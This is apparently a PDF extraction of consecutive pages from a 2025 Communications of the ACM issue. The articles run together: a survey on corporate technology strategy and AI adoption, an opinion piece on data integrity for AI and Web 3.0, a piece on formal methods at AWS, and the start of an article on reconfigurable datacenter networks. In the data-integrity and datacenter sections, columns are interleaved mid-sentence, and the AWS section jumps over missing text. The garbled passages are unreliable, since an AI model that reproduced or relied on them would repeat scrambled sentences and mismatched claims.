Boards of directors. Survey results suggest that only 27% of the companies regard their boards as proactive. More than 73% of companies report that their boards are only reactive or have little or no interest in technology strategy. That said, there is one area where boards are proactive and reactive: cybersecurity, where more than 90% of boards are engaged in cybersecurity threats and investments. These findings highlight the problematic gaps between executive decision making and board influence.

Cybersecurity. When asked about cybersecurity, the answers range from self-described "innovators" to "unprepared." Remarkably, 29% of respondents selected either "insufficiently" or "don't know" when asked about their cybersecurity funding. Is cybersecurity funding an effort to dodge what "might go wrong" or assuring "what must go right"?

Strategy. Why do companies invest in technology? What competitive advantage are they seeking? The responses here were equally surprising, and suggest some digital era challenges. As business moves toward "all-digital" status—that is, 24/7 technology-enabled business processes—only 19% of companies see their business and technology strategies as intertwined. Thirty-five percent believe they are "very different" and 46% see business and technology strategies as somewhat related.

Motivations. Motivations vary too. While "digital transformation" still has conceptual appeal, cost reduction topped the list of motivators. Others cited "fear of competition" and "C-suite pressure." Revenue generation—while always important—is not the first priority.

Innovation. One of the most surprising findings is that over 55% of companies do not actively track emerging technologies or maintain technology watch lists. Only 36% claim that they do, which is surprisingly low in the age of digital transformation. Massive innovation readiness gaps follow. Only 17% of companies have a well-funded, well-defined innovation strategy. Forty-nine percent have a "partial" innovation strategy, and 34% have no innovation strategy at all. This finding defines the essence of risk, since new, digital era business models and processes are almost always technology driven.

The Strange Case of AI
A 2024 McKinsey survey describes GenAI as a major driver of strategic competitiveness, yet the executives we surveyed do not see AI as a strategic differentiator.6 This was especially surprising given all of the publicity and prototyping related to AI, machine learning, and GenAI. But despite all this publicity, only 20% of companies defined AI initiatives as high priority, and more than 47% defined them as insufficient or "unknown." Consistent with this finding, only 25% adequately fund their AI initiatives and 37% believe they do "sometimes"; 37% report their AI initiatives are not adequately funded or they just do not know. How was this even possible circa 2024?

When asked about where their AI initiatives appeared on the technology adoption curve, 32% of companies described themselves as "innovators" and "early adopters," which contradicts some other findings. Approximately 53% describe themselves as "late majority," "laggards," or completely "unprepared" for AI. When asked specifically about GenAI—ChatGPT, Gemini, and so forth—23% said they have explored the potential and risks of generative AI, but 77% said they had only looked at GenAI briefly or not at all. Given all of the interest—and opportunity—in AI, these findings—in 2023–2024—are stunning.

Recommendations
The lack of technology ROI, inadequate technology tracking, poor innovation funding, disengaged boards of directors, a casual view of AI, stubborn requirements-driven technology projects, and the separation of business and technology strategies all define the need to modernize the business-technology relationship and the entire technology investment strategy.

In response to the survey data, here are some steps companies might consider:
˲ Companies should revisit their technology reporting structures. While "control" can reduce risk and enable accountability, opportunities for technology-enabled solutions should be widened across lines of business where decentralized technology teams act on their own to develop technology strategies for their own markets.
˲ Enterprises and lines of business should invest in technology tracking, testing, and adoption. They should avoid becoming "late adopters" of emerging and disruptive technology, which is the blueprint for competitive unpreparedness.
˲ Requirements-first/technology-second is a conservative adoption strategy that defined technology applications development in the 20th century. While the approach still holds for some well-bounded requirements—such as ERP and CRM requirements—most requirements are dynamic and cannot be easily "matched" with technology solutions. Technology exploration should often replace requirements-first technology investments.
˲ Emerging and disruptive technology should be tracked and assessed on a continuing basis. Internal teams should be assigned to this task. Technologies should be assessed for their problem-solving potential, cost, risks, and impact—and reviewed at least quarterly.
˲ Innovation methods, tools, techniques, talent, and funding should be defined and acquired. There is no such thing as a "partial" innovation strategy.
˲ Board directors should be recruited for their knowledge and experience as well as their strategic demeanor and ambition. Technology-savvy board directors should be recruited and retained. The board should also have a technology committee separate from audit and compliance oversight.
˲ AI, machine learning, and GenAI should immediately rise to the top of the emerging/disruptive technology list. Credible talent should be developed or hired.
˲ Distinctions between business and technology strategy are nearly obsolete, since all companies to some degree are now technology companies. Technology and business are intertwined today more than ever before, with growth needs only reasonably expected.
˲ The overall business-technology relationship should be assessed by a team comprised of chief strategy officers and chief technology officers where it is impossible for an observer to know who is who.

Conclusion
The data we collected yielded some surprising results about how technology is organized, tracked, secured, innovated, adopted, governed, and integrated into business strategy. The results revealed that despite all of the excitement about AI, machine learning, and GenAI, adoption even here is slow. Our survey suggests that no matter what the industry, who the leadership is, or the size of the company, the business-technology relationship still has a long way to go.

References
1. Carlton, R. Ten ERP failure statistics that highlight the importance of getting it right the first time round. ERP Focus (Aug. 2019).
2. Fruhlinger, J., Wailgum, T., and Sayer, P. 16 famous ERP disasters, dustups and disappointments. CIO Magazine (Mar. 2020).
3. Guerthoff, A. Why 70% of all CRM projects fail. LinkedIn (May 2020).
4. Peppard, J. Why do companies' IT projects fail so often? Wall Street J. (Sept. 2023).
5. Pratt, M. Why IT projects still fail. CIO Magazine (Oct. 2023).
6. Singla, A. et al. The State of AI in Early 2024: Gen AI Adoption Spikes and Starts to Generate Value. McKinsey (May 2024).

Stephen J. Andriole ([email protected]) is the Thomas G. Labrecque Professor of Business Technology in the Department of Accounting and Information Systems at Villanova University, Villanova, PA, USA.

Noah P. Barsky ([email protected]) is an associate professor in the Department of Accounting and Information Systems at Villanova University, Villanova, PA, USA.

© 2025 Copyright held by the owner/author(s).
Opinion
Web 3.0 Requires
Data Integrity
New integrity-focused standards are necessary to enable
the trusted AI services of tomorrow.
IF YOU’VE EVER taken a computer security class, you’ve probably learned about the three legs of computer security—confidentiality, integrity, and availability—known as the CIA triad.a
When we talk about a system being
secure, that’s what we’re referring to.
All are important, but to different de-
grees in different contexts. In a world
populated by artificial intelligence
(AI) systems and artificial intelligent
agents, integrity will be paramount.
What is data integrity? It’s ensuring
that no one can modify data—that’s
the security angle—but it’s much more
than that. It encompasses accuracy,
completeness, and quality of data—all
over both time and space. It’s prevent-
ing accidental data loss; the “undo”
button is a primitive integrity mea-
sure. It’s also making sure that data
is accurate when it’s collected—that it
comes from a trustworthy source, that nothing important is missing, and that it doesn't change as it moves from format to format. The ability to restart your computer is another integrity measure.

The CIA triad has evolved with the Internet. The first iteration of the Web—Web 1.0 of the 1990s and early 2000s—prioritized availability. This era saw organizations and individuals rush to digitize their content, creating what has become an unprecedented repository of human knowledge. Organizations worldwide established their digital presence, leading to massive digitization projects where quantity took precedence over quality. The emphasis on making information available overshadowed other concerns.

As Web technologies matured, the focus shifted to protecting the vast amounts of data flowing through online systems. This is Web 2.0: the Internet of today. Interactive features and user-generated content transformed the Web from a read-only medium to a participatory platform. The increase in personal data, and the emergence of interactive platforms for e-commerce, social media, and online everything demanded both data protection and user privacy. Confidentiality became paramount.

We stand at the threshold of a new Web paradigm: Web 3.0. This is a distributed, decentralized, intelligent Web. Peer-to-peer social-networking systems promise to break the tech monopolies' control on how we interact with each other. Tim Berners-Lee's open W3C protocol, Solid, represents a fundamental shift in how we think about data ownership and control. A future filled with AI agents requires verifiable, trustworthy personal data and computation. In this world, data integrity takes center stage.

For example, the 5G communications revolution isn't just about faster access to videos; it's about Internet-connected things talking to other Internet-connected things without our intervention. Without data integrity, for example, there's no real-time car-to-car communications about road movements and conditions. There's no drone swarm coordination, smart power grid, or reliable mesh networking. And there's no way to securely empower AI agents.

AI systems need clean, consistent, and verifiable control processes to learn and make decisions effectively.

In particular, AI systems require robust integrity controls because of how they process data. This means techni-

building and deploying digital systems that impact human lives and societal outcomes.

At the foundation level, bits are stored in computer hardware. This represents the most basic encoding of our data, model weights, and computational instructions. The next layer up is the file system architecture: the way those binary sequences are organized into structured files and directories that a computer can efficiently access and process. In AI systems, this includes how we store and organize training data, model checkpoints, and hyperparameter configurations. On top of that are the application layers—the programs and frame-

development begins. At the model level, mathematical foundations and training processes can introduce new

a https://tinyurl.com/248uyhq6
cal controls to ensure data is accurate, integrity issues even with clean data. works, such as PyTorch and Tensor-
that its meaning is preserved as it is During execution, environmental Flow, that allow us to train models,
processed, that it produces reliable changes and runtime modifications process data, and generate outputs.
results, and that humans can reliably can corrupt previously valid models. This layer handles the complex math-
alter it when it’s wrong. Just as a scien- And at the output level, the challenge ematics of neural networks, gradient
tific instrument must be calibrated to of verifying AI-generated content and descent, and other ML operations.
measure reality accurately, AI systems tracking it through system chains cre- Finally, at the user-interface level,
need integrity controls that preserve ates new integrity concerns. Each level we have visualization and interaction
the connection between their data compounds the challenges of the ones systems—what humans actually see
and ground truth. before it, ultimately manifesting in and engage with. For AI systems, this
This goes beyond preventing data human costs, such as reinforced bi- could be everything from confidence
tampering. It means building systems ases and diminished agency. scores and prediction probabilities to
that maintain verifiable chains of trust Think of it like protecting a house. generated text and images or autono-
between their inputs, processing, and You don’t just lock a door; you also mous robot movements.
outputs, so humans can understand use safe concrete foundations, sturdy Why does this layered perspective
and validate what the AI is doing. AI framing, a durable roof, secure dou- matter? Vulnerabilities and integrity
systems need clean, consistent, and ble-pane windows, and maybe motion- issues can manifest at any level, so un-
verifiable control processes to learn sensor cameras. Similarly, we need derstanding these layers helps securi-
and make decisions effectively. With- digital security at every layer to ensure ty experts and AI researchers perform
out this foundation of verifiable truth, the whole system can be trusted. comprehensive threat modeling. This
AI systems risk becoming a series of This layered approach to under- enables the implementation of de-
opaque boxes. standing security becomes increas- fense-in-depth strategies—from cryp-
Recent history provides many so- ingly critical as AI systems grow in tographic verification of training data
bering examples of integrity failures complexity and autonomy, particular- to robust model architectures to inter-
that naturally undermine public trust ly with large language models (LLMs) pretable outputs. This multi-layered
in AI systems. Machine-learning (ML) and deep-learning systems making security approach becomes especially
models trained without thought on high-stakes decisions. We need to crucial as AI systems take on more au-
expansive datasets have produced verify the integrity of each layer when tonomous decision-making roles in
predictably biased results in hiring critical domains such as healthcare,
systems. Autonomous vehicles with finance, and public safety. We must
incorrect data have made incorrect— A lack of integrity ensure integrity and reliability at every
and fatal—decisions. Medical diag- level of the stack.
nosis systems have given flawed rec- controls undermines The risks of deploying AI without
ommendations without being able to AI systems and proper integrity control measures are
explain themselves. A lack of integrity severe and often underappreciated.
controls undermines AI systems and harms people who When AI systems operate without suf-
harms people who depend on them. depend on them. ficient security measures to handle
They also highlight how AI integ- corrupted or manipulated data, they
rity failures can manifest at multiple can produce subtly flawed outputs
levels of system operation. At the that appear valid on the surface. The
training level, data may be subtly cor- failures can cascade through inter-
rupted or biased even before model connected systems, amplifying errors
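The “cryptographic verification of training data” mentioned here can be made concrete with a small sketch: record a digest of every item when the data is collected, then re-verify the digests before training, so any addition, removal, or modification is detected. This is an illustrative Python sketch; the file names and labels are invented, not part of any real pipeline.

```python
import hashlib

def sha256_digest(data: bytes) -> str:
    """Return the hex SHA-256 digest of a blob of training data."""
    return hashlib.sha256(data).hexdigest()

def build_manifest(dataset: dict) -> dict:
    """Record a digest for every item when the data is first collected."""
    return {name: sha256_digest(blob) for name, blob in dataset.items()}

def verify(dataset: dict, manifest: dict) -> list:
    """Return the names of items that were added, removed, or modified."""
    bad = [n for n, d in manifest.items()
           if n not in dataset or sha256_digest(dataset[n]) != d]
    bad += [n for n in dataset if n not in manifest]
    return sorted(bad)

dataset = {"a.txt": b"label=cat", "b.txt": b"label=dog"}
manifest = build_manifest(dataset)
assert verify(dataset, manifest) == []         # untouched data passes
dataset["b.txt"] = b"label=fox"                # simulated tampering
assert verify(dataset, manifest) == ["b.txt"]  # the change is detected
```

A manifest like this only pins the data to the moment of collection; it says nothing about whether the source itself was trustworthy, which is why the article treats provenance as a separate integrity concern.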
JUNE 2025 | VOL. 68 | NO. 6 | COMMUNICATIONS OF THE ACM 35
Ottenheimer has been leading large-scale enterprise security innovations and operations across multiple industries for more than 30 years.

© 2025 Copyright held by the owner/author(s).
Systems Correctness Practices at Amazon Web Services

AMAZON WEB SERVICES (AWS) strives to deliver reliable services that customers can trust completely. This requires maintaining the highest standards of security, durability, integrity, and availability—with systems correctness serving as the cornerstone for achieving these priorities. An April 2015 article published in Communications, titled “How Amazon Web Services Uses Formal Methods,” highlighted the approach for ensuring the correctness of critical services that have since become among the most widely used by AWS customers.21

Central to this approach was TLA+,14 a formal specification language developed by Leslie Lamport. … bugs that would have eluded traditional approaches such as testing. Second, we gained the deep understanding and confidence needed to implement aggressive performance optimizations while maintaining systems correctness.

Moreover, 15 years ago, AWS’s software testing practice relied primarily on build-time unit testing, often against mocks, and limited deployment-time integration testing. Since then, we have significantly evolved our correctness practices, integrating both formal and semi-formal approaches into the development process. As AWS has grown, formal methods have become increasingly valuable—not only for ensuring correctness but also for performance improvements, particularly in verifying the correctness of both low- and high-level optimizations. This systematic approach toward systems correctness has become a force multiplier at AWS’s scale, enabling faster development cycles through improved developer velocity while delivering more cost-effective services to customers.

This article surveys the portfolio of formal methods used across AWS to deliver complex services with high confidence in their correctness. We consider an umbrella definition of formal methods that encompasses these rigorous techniques—from traditional formal approaches (such as theorem proving,7,10 deductive verification,18 and model checking8,14) to more lightweight semi-formal approaches (such as property-based testing,6,19 fuzzing,9 and runtime monitoring11).

The P Programming Language
As the use of formal methods was expanded beyond the initial teams at AWS in the early 2010s, we discovered that many engineers struggled to learn and become productive with TLA+.
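To give a flavor of what specification languages such as TLA+ and P check, here is a deliberately tiny Python sketch (not P or TLA+ themselves) of exhaustive state-space exploration: a broken two-process lock whose check and set happen in separate steps, plus a breadth-first search that finds the mutual-exclusion violation automatically. The protocol and its state encoding are invented for illustration; real checkers like TLC explore vastly larger spaces.

```python
from collections import deque

# Each process: "idle" -> (sees lock free) "ready" -> "crit" -> "idle".
# The check and the set are separate steps, so the lock is racy.
def successors(state):
    pcs, lock = state
    for i in (0, 1):
        pc = pcs[i]
        if pc == "idle" and lock == 0:
            yield (pcs[:i] + ("ready",) + pcs[i+1:], lock)  # check lock
        elif pc == "ready":
            yield (pcs[:i] + ("crit",) + pcs[i+1:], 1)      # set + enter
        elif pc == "crit":
            yield (pcs[:i] + ("idle",) + pcs[i+1:], 0)      # leave

def check(init, invariant):
    """Breadth-first search over every reachable state; return a
    violating state, or None if the invariant holds everywhere."""
    seen, queue = {init}, deque([init])
    while queue:
        s = queue.popleft()
        if not invariant(s):
            return s
        for t in successors(s):
            if t not in seen:
                seen.add(t)
                queue.append(t)
    return None

mutual_exclusion = lambda s: s[0].count("crit") <= 1
bad = check((("idle", "idle"), 0), mutual_exclusion)
assert bad == (("crit", "crit"), 1)  # the race is found automatically
```

The payoff mirrors the article’s point: a design-level bug surfaces mechanically from the model, before any implementation exists.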
… get right at S3 scale, and the team wanted to deliver strong consistency with high confidence in correctness, they used P to formally model and validate the protocol design. P helped eliminate several design-level bugs early in the development process and allowed …

… for the implementation makes the investment in formal specification much more valuable and addresses classic concerns with the deployment of formal methods in practice (that is, connecting design-time validation with system implementation).

… hardware and other system failures are simulated during testing), and minimization (where counterexamples are automatically reduced to aid human-guided debugging).

Deterministic simulation. Another lightweight method widely used at …
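The idea behind deterministic simulation can be sketched as follows: drive every nondeterministic choice (message ordering, injected failures) from a single seeded random-number generator, so that any failing run can be replayed exactly from its seed. A minimal Python sketch, with an invented toy “network”:

```python
import random

def run(seed, n_msgs=5):
    """Deliver n_msgs messages through a lossy, reordering network whose
    every choice comes from one seeded RNG, so a failing run can be
    replayed exactly from its seed."""
    rng = random.Random(seed)
    pending = list(range(n_msgs))
    delivered = []
    while pending:
        i = rng.randrange(len(pending))  # nondeterministic reordering
        msg = pending.pop(i)
        if rng.random() < 0.2:           # simulated drop
            pending.append(msg)          # sender retries
        else:
            delivered.append(msg)
    return delivered

# The same seed always yields the same schedule and the same outcome.
assert run(42) == run(42)
```

Because the schedule is a pure function of the seed, a counterexample found overnight in a fuzzing fleet reproduces on a developer’s laptop, which is what makes the minimization step mentioned above practical.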
… systems. For example, it can be triggered in most systems with timeout-and-retry client logic.

Traditional formal approaches to modeling distributed systems typically focus on safety (nothing bad happens) and liveness (something good eventually happens), but metastable failures remind us that systems have a variety of behaviors that cannot be neatly categorized this way. We have increasingly turned to discrete-event simulation to understand the emergent behavior of systems, investing both in custom-built systems simulations and tooling that allow the use of existing system models (built in languages such as TLA+ and P) to simulate system behavior. Extending exhaustive model checkers, like TLA+’s TLC, with probabilistic simulations also allows for the generation of statistical results such as posterior latency distributions, making model checking useful for tasks such as understanding the achievability of latency service-level agreements (SLAs).

Formal Proof
In some cases, the formal methods enumerated so far in this article are not sufficient. For critical security boundaries such as authorization and virtualization, for example, proofs of correctness can be both desirable and worth the significant investment needed to create them.

In 2023, AWS introduced the Cedar authorization policy language for writing policies that specify fine-grained permissions. Cedar was designed for automated reasoning and formal proof.12,24 The language was designed to be well-suited for proof, and the implementation was built in the verification-aware programming language Dafny. Using Dafny, the team was able to prove that the implementation satisfies a variety of security properties. This type of proof goes beyond testing. It is a proof in the mathematical sense. The team also applied a differential-testing approach using the Dafny code as a correctness oracle to verify the correctness of the production-ready Rust implementation. Publishing the Dafny code and test procedures as open source, along with the Cedar implementation, allows Cedar users to check the team’s work on correctness.

Another example is the Firecracker virtual machine monitor (VMM). Firecracker uses a low-level protocol called virtio to expose emulated hardware devices (such as a network card or solid-state drive) to guest kernels running inside the VM. This emulated device is a critical security boundary because it is the most complex interaction between the untrusted guest and trusted host. The Firecracker team used a tool called Kani20 that can reason formally about Rust code to prove key properties of this security boundary. Again, proof here goes beyond testing and ensures that the critical properties of this boundary hold no matter what the guest attempts to do.

Proofs around the behaviors of programs are an important part of AWS’s software correctness program, so we support development on tools such as Kani, Dafny,18 and Lean,16 and the underlying tools—such as satisfiability modulo theories (SMT) solvers—that power them.

The ability to use formal models and specifications—for model-checking systems at design time, for validating in-production behavior by serving as a correctness oracle for runtime monitoring, for simulating emergent systems behavior, and for building proofs of critical properties—allows AWS to amortize the engineering effort of developing these specifications over a larger amount of business and customer value.

Benefits Beyond Correctness
Finally, as discussed in the aforementioned 2015 paper, formal methods are a crucial part of safely improving the performance of cloud systems. Modeling a key commit protocol for the Aurora relational database engine in P and TLA+ allowed us to identify an opportunity to reduce the cost of distributed commits from 2 to 1.5 network roundtrips without sacrificing any safety properties. Such stories are common for teams that adopt formal methods, driven by at least two dynamics.

First, the act of deeply thinking about and formally writing down distributed protocols forces a structured way of thinking that leads to deeper insights about the structure of protocols and the problem to be solved. Second, the ability to formally check (and, in some cases, prove) that proposed design optimizations are correct allows naturally conservative distributed-systems engineers to be bolder in their protocol design choices without increasing risk, boosting developer velocity toward delivering reliable services.

These productivity and cost benefits are not limited to high-level design optimizations; they extend to low-level code that normally gets ignored. In one example, the AWS team identified optimizations to the implementation of the Rivest-Shamir-Adleman (RSA) public-key encryption scheme on our Arm-based Graviton2 processor, which could improve throughput by up to 94%.17 Using the HOL Light interactive theorem prover, the team was able to prove the correctness of these optimizations. Given the high percentage of cloud CPU cycles spent on cryptography, this type of optimization can significantly reduce infrastructure costs and aid sustainability while at the same time improving customer-visible performance.
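The differential-testing pattern described for Cedar (a trusted artifact serving as a correctness oracle for an optimized implementation) can be sketched in a few lines. Here, as an invented stand-in, a hand-rolled square-and-multiply modular exponentiation, the kind of primitive the RSA work above optimizes, is checked against Python’s built-in `pow` as the oracle:

```python
import random

def modpow_fast(base, exp, mod):
    """Candidate optimized square-and-multiply modular exponentiation,
    the kind of low-level routine that proofs or oracles must vet."""
    result, b = 1, base % mod
    while exp:
        if exp & 1:
            result = (result * b) % mod
        b = (b * b) % mod
        exp >>= 1
    return result

# Differential testing: compare the candidate against a trusted oracle
# (Python's built-in pow) on many random inputs.
rng = random.Random(0)
for _ in range(1000):
    base = rng.randrange(1, 1 << 64)
    exp = rng.randrange(0, 1 << 32)
    mod = rng.randrange(2, 1 << 64)
    assert modpow_fast(base, exp, mod) == pow(base, exp, mod)
```

Unlike the HOL Light proof in the article, random comparison gives only statistical confidence, which is exactly why AWS pairs differential testing with mathematical proof for the most critical code.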
Divyakant Agrawal
UC Santa Barbara, USA
Revolutionizing Datacenter Networks via Reconfigurable Topologies

DATACENTER NETWORKS HAVE become critical infrastructure for our digital society. Indeed, the performance of many distributed systems and cloud applications—for example, those related to distributed machine learning (ML), batch processing, scale-out databases, or streaming—critically depends on the throughput capacity of the underlying […] throughput of datacenter networks, and leading companies such as Google, Microsoft, and Meta are competing to improve the operations of their networks.8,29,32

key insights
˽ Datacenter networks have become a critical infrastructure for our digital society, serving explosively growing communication traffic.
˽ Reconfigurable datacenter networks (RDCNs), which can adapt their topology dynamically based on innovative optical switching technologies, have the potential to improve datacenter network performance and to simplify datacenter planning and operations.
˽ Demand-aware dynamic topologies are particularly interesting because […]

State-of-the-art datacenter network topologies have two common features: They are fixed and oblivious to the traffic demands they serve. In particular, current datacenter topologies are optimized for uniform, “all-to-all” traffic. This stands in stark contrast to the actual traffic patterns in datacenters, which often feature distinct spatial and temporal structures—that is, they are skewed and bursty.18,29 Thus, to further improve datacenter performance, a particularly intriguing and novel approach is to leverage a new degree of freedom related to the physical network topology.

Emerging optical technologies enable reconfigurable datacenter networks (RDCNs): networks whose topologies can dynamically change to accommodate, or even adapt to and exploit, the structures in their communication traffic in a self-adjusting manner. Therefore, RDCNs introduce resource-allocation flexibility in the physical layer. This is also known as topology engineering: the ability to control the dynamic network topology. More specifically, these dynamic datacenter topologies do not require any rewiring, but rather are enabled by optical circuit switches (OCSs) and similar technologies. Depending on the specific technology used, the topological interconnects between racks can be changed within milliseconds, microseconds, or, recently, even nanoseconds.

There is still, however, no consensus in the community on which RDCN design is optimal. In particular, though static network topologies are currently well understood and fat-tree topologies2 have emerged as the de facto topologies for datacenters, we still lack fundamental models and metrics for rigorously studying and comparing different RDCN designs. In this article, we provide an overview of RDCNs. We first review the motivation for RDCNs and discuss their technological enablers. We then present a taxonomy of the RDCN design space and propose a formal model to raise interest in the topic in the research community. We conclude by discussing challenges ahead, also based on interviews with experts.

Empirical Motivation: Structure in Applications’ Traffic

Think about a machine learning training job, say, training a ChatGPT model. It takes months to train this model, but the traffic matrix is beautifully predictable and periodic, which makes it very suitable to think about whether or not we could adjust the topology according to the traffic.
— Manya Ghobadi (MIT)

Datacenter traffic is growing explosively in volume.28 Moreover, it features distinct structures: Packet traces from real-world applications are far from arbitrary or random. Measurement studies18,29 have revealed that the traffic patterns in datacenters feature considerable locality, in both space and time: They are skewed and bursty4 and communication clusters are relatively stable over time.12,29 Kandula et al.18 showed that much of the traffic volume in production Microsoft datacenters could be explained by simple patterns. Facebook (now Meta)29 reported that in their datacenters, many flows are long-lived, and though hosts (servers) often communicate with hundreds of hosts and racks concurrently, the majority of traffic is often destined for only a few tens of racks.

As a small-scale example, consider Figure 1a, which shows a GPU-to-GPU trace that was generated by a neural network training job. This trace features both temporal and spatial locality (structure). The trace histogram—more specifically, its demand matrix (top)—is skewed, exhibiting a spatial structure. Moreover, compared to a uniform trace (bottom), the traffic is bursty in the time dimension, featuring a temporal structure.

The specific degree of traffic locality depends on the application.4,29 A new methodology, called a complexity map, provides an intuitive visualization of the strengths of the temporal and non-temporal structures in the traffic of different distributed applications.4 The complexity map measures the amounts of entropy in a trace along the space and time dimensions and compares them to those of a completely unstructured (uniform) trace. Figure 1b shows a complexity map for seven different real-world traces:29 three different Facebook datacenter traces, related to Web (WEB), database (DB), and Hadoop (HAD) applications; two high-performance computing benchmarks (CNS and MultiGrid); a machine learning job (ML); and a popular synthetic trace, pFabric
Figure 1. (a) Visualization of the spatial and temporal structures of a simple packet trace (middle) from a machine learning application, a popular convolutional neural network training job, on four GPUs. (top) The demand matrix. (bottom) An i.i.d. trace with the same distribution. Entries in the trace are shown in the order of appearance. (b) A complexity map of seven real traces (colored circles) and four reference points placed at the corners of the map. The map plots non-temporal complexity against temporal complexity; the corner reference points are Uniform (upper right), Bursty (upper left), Skewed (lower right), and Skewed & Bursty (lower left).
(pFab). For reference, it also shows a purely uniform traffic pattern, which is mapped to the upper right; a pattern that features only a temporal structure but no spatial structure, on the upper left; and a pattern that features only a spatial structure, on the lower right. We can see that the seven real-world traces indeed have different amounts of structure, and none of these traffic patterns is uniform.

Figure 2. Examples of state-of-the-art static datacenter network topologies with eight racks, each containing two hosts. (a) A fat-tree, bi-regular topology with two types of switches: top-of-rack (ToR) switches (in blue) connecting to the hosts, and additional switches (in green) to increase throughput. (b) An expander-based, uni-regular topology, with only ToR switches. In both topologies, the diameter is four.
The expanding variety of cloud ap- (a) Fat-tree topology – bi-regular (b) Expander topology – uni-regular
plications not only creates additional
traffic patterns that come in many dif-
ferent flavors, but also introduces dif- network via a top-of-rack (ToR) switch. ters provide the desired non-blocking
ferent performance requirements. For Traditional datacenter networks architecture, this comes at the cost of
instance, batch processing applications are built from electrical switches con- requiring additional switches that are
such as Hadoop exhibit an all-to-all nected by high-speed optical fibers. not connected to the hosts. Figure 2a
traffic pattern that requires very high Most deployed datacenter networks rely shows an example of a non-blocking,
throughput; short query traffic has a on fat-tree topologies, which are based three-layer, fat-tree topology that con-
skewed pattern and requires very low la- on Clos networks,2 and come in dif- nects eight racks, where the two types
tency; and all-reduce operations in ML ferent flavors.2,29,32 In contrast to other of switches (each of radix four) are col-
applications exhibit a ring or tree-like communication networks, datacen- ored in blue and green.
traffic pattern, with a small number of ter networks typically operate under a Aiming to provide full bisection
elephant flows whose completion times single administrative domain, which bandwidth at lower cost, another recent
critically affect the overall application facilitates simpler control using, for class of datacenter networks is based on
performance.36 Traffic patterns can example, software-defined networking uni-regular topologies,27 which can have
also change over time; for example, one (SDN). Such a single domain can in- lower installation and management
training iteration typically contains for- clude a unified controller and network overheads. Here, every switch connects
ward, backward, and all-reduce phases, operating system (NOS), and allows for to a fixed number of hosts. These net-
resulting in periodic (and fairly predict- fast and fine-grained adaptation of the works also come in different flavors
able) demand.37 network layer. and their topologies are often based on
The main takeaway is that while Existing datacenters typically aim to expander graphs.34 Figure 2b shows an
datacenter communication traffic achieve a throughput metric called full example of an expander-based, uni-reg-
comes in different flavors, each still fea- bisection bandwidth, which essentially ular topology that connects eight racks
tures some structure and therefore has means non-blocking traffic forwarding. using only ToR switches (of radix 4).
low complexity. This structure, in turn, The bisection bandwidth refers to the Alternative throughput metrics have
provides opportunities for researchers smallest aggregate capacity of the links also been presented in the literature on
to optimize the network topology ac- crossing the worst-case cut among all datacenter networks. The throughput
cordingly. possible cuts that divide the topology under a given saturateda traffic matrix
graph into two halves. A network has T can be defined as the largest scal-
Traditional Datacenter full bisection bandwidth if its bisection ing factor θ(T) such that the topology
Network Topology Design bandwidth is equal to half of the total can support the traffic matrix, with-
The most essential property of tradi- host traffic; topologies like fat-tree- out violating any link’s capacity con-
tional datacenter networks is that they based networks permit arbitrary appli- straint. The worst-case throughput of
use static wired topologies. As data- cation instance placement. To achieve a topology among all traffic matrices is
center traffic patterns evolve over time, this, fat-tree datacenter networks are denoted by θ∗. A topology can support
these static topologies are designed to typically based on a non-blocking mul- any traffic demand if and only if θ∗ is at
work well for any communication in- tistage switching topology built out of least 1 (in this case, we say that the to-
put; thus, they are oblivious to the real smaller radix switch chips. In the re- pology has full throughput). Because it
traffic, in the sense that they are opti- sulting hierarchical designs, referred to can support any traffic demand, a full-
mized only for the worst-case scenario. as bi-regular topologies,27 there are two throughput topology also permits arbi-
Accordingly, common datacenter net- types of switches: switches that connect trary application instance placement
work topologies are regular and sym- to hosts (and from which traffic thus en- by definition. In a systematic compari-
metric, with many redundant short ters the network) and switches that con- son of the bisection bandwidth and
paths to support high capacity and nect only to other switches (which there- throughput metrics, it was recently
availability. Hosts (or other compute in- fore merely forward traffic). Adding
frastructures, such as GPUs) in datacen- more switches of the former type can a The sum of the rates in each row and column
ters are usually mounted in racks, each help increase the throughput between of the demand matrix matches the switch
of which is connected to the datacenter hosts. While such bi-regular datacen- capacities.
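For small examples, the bisection-bandwidth definition above can be checked directly by enumerating every balanced cut. A brute-force Python sketch with an invented four-node topology (feasible only for toy sizes; real networks need smarter algorithms):

```python
from itertools import combinations

def bisection_bandwidth(n_nodes, links):
    """Brute-force bisection bandwidth of a small topology: the minimum
    total capacity crossing any cut that splits the nodes into two equal
    halves. `links` maps frozenset({u, v}) -> link capacity."""
    best = float("inf")
    for half in combinations(range(n_nodes), n_nodes // 2):
        left = set(half)
        crossing = sum(cap for link, cap in links.items()
                       if len(link & left) == 1)  # link crosses the cut
        best = min(best, crossing)
    return best

# A 4-node ring with unit-capacity links: every balanced cut severs at
# least two links, so the bisection bandwidth is 2.
ring = {frozenset({i, (i + 1) % 4}): 1 for i in range(4)}
assert bisection_bandwidth(4, ring) == 2
```

The same enumeration idea extends, at exponential cost, to the worst-case throughput metric θ∗, which is one reason the article calls for better models and metrics rather than exhaustive computation.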
found that depending on which metric is used, different conclusions may result, affecting cost and management complexity.27 In general, it is believed that throughput metrics better capture the capacity of both uni-regular and bi-regular topologies.

Traditional datacenter network designs (whether bi-regular or uni-regular) all share the properties of being fixed and oblivious to the real demand. This can come at a cost. In particular, static topologies inherently require multi-hop forwarding, which can introduce inefficiencies, especially for large flows: The more hops a flow must traverse, the more network capacity is consumed. In the literature, this overhead has been termed bandwidth tax,23 referring to the additional bytes that need to be sent along multiple hops (due to multi-hop routing) compared with direct, single-hop routing. In current fat-tree-based datacenter designs, due to the radix limitation of switches, the network diameter is usually six or eight hops. Recently, it was shown that the expected route length (that is, bandwidth tax) and the throughput are inversely related in uni-regular designs: the higher the tax, the lower the throughput.1,15,27

There are further limitations associated with existing datacenter network designs. For example, while the fiber-optic links widely used in datacenters can meet high-bandwidth demands, the optical–electrical–optical conversion necessary to connect these links to power-hungry electrical packet switches is costly and introduces inefficiencies and overhead.28 Current datacenters are also often inflexible, in that they are optimized for homogeneous hardware: a spine layer with uniform support for the fastest devices that might connect to it. As hosts and storage devices are continuously evolving, without support for heterogeneous speeds, incremental deployments are expensive. Clearly, replacing the entire spine layer to support a faster speed would be impractical, involving hundreds of individual racks and thousands of fibers.

Paradigm Shift: Reconfigurable Topologies and Their Enabling Optical Technologies

It’s really more recently that we’re performing real-time, what I call “topology engineering,” to match communication patterns.
— Amin Vahdat (Google)

